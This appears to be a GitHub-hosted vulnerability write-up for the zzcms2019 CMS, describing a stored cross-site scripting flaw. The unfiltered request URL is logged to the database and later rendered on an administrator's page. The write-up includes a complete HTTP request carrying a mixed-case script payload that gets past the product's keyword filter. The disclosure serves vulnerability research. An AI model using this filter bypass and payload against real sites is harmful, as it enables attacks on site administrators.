Skip to content
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
107 lines (75 sloc) 3.27 KB


Edition: zzcms2019 /user/ask.php

0x01 Vulnerability

Get the do parameter with the get method

switch ($do) {
case "add":add();break;
case "modify":modify();break;

The modify()function

function modify()
    global $username; ?>

<div class="admintitle">修改问答信息</div>
$page = isset($_GET['page'])?$_GET['page']:1;
    $id = isset($_GET['id'])?$_GET['id']:0;
    checkid($id, 1);

    $sqlzx="select * from zzcms_ask where id='$id'";
    $rszx =query($sqlzx);
    $rowzx = fetch_array($rszx);
    if ($id<>0 && $rowzx["editor"]<>$username) {
    } ?>	  

Which called the vulnerable function markit()

This function in/inc/function.php

function markit()
    $userip = $_SERVER["REMOTE_ADDR"];
    $url = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    query("insert into zzcms_bad (username,ip,dose,sendtime)values('" . $_COOKIE["UserName"] . "','$userip','$url','" . date('Y-m-d H:i:s') . "')");

The $url is not filtered and inserted directly into the database, so we can register a user and access, which will appear

At this point we can use Burpsuite to capture the package, modify the URI path of the package to /user/ask.php?do=modify&page=1&id=1&aaa=<sCrIpT>alert(/xss/)</ScRiPt>

Use <sCrIpT>alert(/xss/)</ScRiPt> because there is a detection function in /inc/stopsqlin.php

if (strpos($_SERVER['REQUEST_URI'],'script')!==false || strpos($_SERVER['REQUEST_URI'],'%26%2399%26%')!==false|| strpos($_SERVER['REQUEST_URI'],'%2F%3Cobject')!==false){
die ("无效参数");//注意这里不能用js提示

The complete package is as follows

GET /user/ask.php?do=modify&page=1&id=1&aaa=<sCrIpT>alert(/xss/)</ScRiPt> HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __tins__713776=%7B%22sid%22%3A%201551009070949%2C%20%22vd%22%3A%205%2C%20%22expires%22%3A%201551010962798%7D; __51cke__=; __51laig__=12; bdshare_firstime=1551002231060; PHPSESSID=8o9ms5t57q6dag7ofku75fn2j7; UserName=test; PassWord=e10adc3949ba59abbe56e057f20f883e
Connection: keep-alive
Upgrade-Insecure-Requests: 1

When the administrator accesses the Users→User Bad Action Record

He/She will be see a alert window which said /xss/

And the database is displayed as follows


You can’t perform that action at this time.